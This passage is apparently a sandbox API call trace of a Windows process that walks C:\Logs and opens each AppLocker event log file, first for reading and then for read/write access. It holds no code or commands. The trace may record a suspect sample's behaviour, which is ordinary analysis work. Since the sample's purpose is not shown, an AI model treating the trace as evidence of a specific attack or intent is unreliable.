InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0086.116] AreFileApisANSI () returned 1 [0086.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx", lpUsedDefaultChar=0x0) returned 57 [0086.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0086.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0086.116] AreFileApisANSI () returned 1 [0086.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0086.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 57 [0086.116] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.116] GetFileType (hFile=0x424) returned 0x1 [0086.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0086.116] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.117] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.117] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.117] CloseHandle (hObject=0x424) returned 1 [0086.118] AreFileApisANSI () returned 1 [0086.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0086.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 57 [0086.118] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.118] GetFileType (hFile=0x424) returned 0x1 [0086.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0086.118] CloseHandle (hObject=0x424) returned 1 [0086.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.119] AreFileApisANSI () returned 1 [0086.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0086.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 57 [0086.119] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0086.119] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.119] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.119] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cAlternateFileName="MI07E1~1.EVT")) returned 1 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0086.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0086.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0086.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0086.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0086.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0086.120] AreFileApisANSI () returned 1 [0086.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", lpUsedDefaultChar=0x0) returned 66 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0086.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0086.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.120] AreFileApisANSI () returned 1 [0086.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0086.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x823b8 [0086.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x823b8, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 66 [0086.121] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.121] GetFileType (hFile=0x424) returned 0x1 [0086.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x823b8 | out: hHeap=0x20000) returned 1 [0086.121] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.121] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.121] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.121] CloseHandle (hObject=0x424) returned 1 [0086.122] AreFileApisANSI () returned 1 [0086.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0086.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82b98 [0086.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x82b98, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 66 [0086.122] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.122] GetFileType (hFile=0x424) returned 0x1 [0086.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b98 | out: hHeap=0x20000) returned 1 [0086.122] CloseHandle (hObject=0x424) returned 1 [0086.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0086.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0086.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0086.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0086.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0086.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0086.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0086.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0086.123] AreFileApisANSI () returned 1 [0086.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82688 [0086.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 66 [0086.123] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0086.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.123] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cAlternateFileName="MI8196~1.EVT")) returned 1 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0086.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0086.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0086.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0086.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0086.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0086.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0086.124] AreFileApisANSI () returned 1 [0086.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged 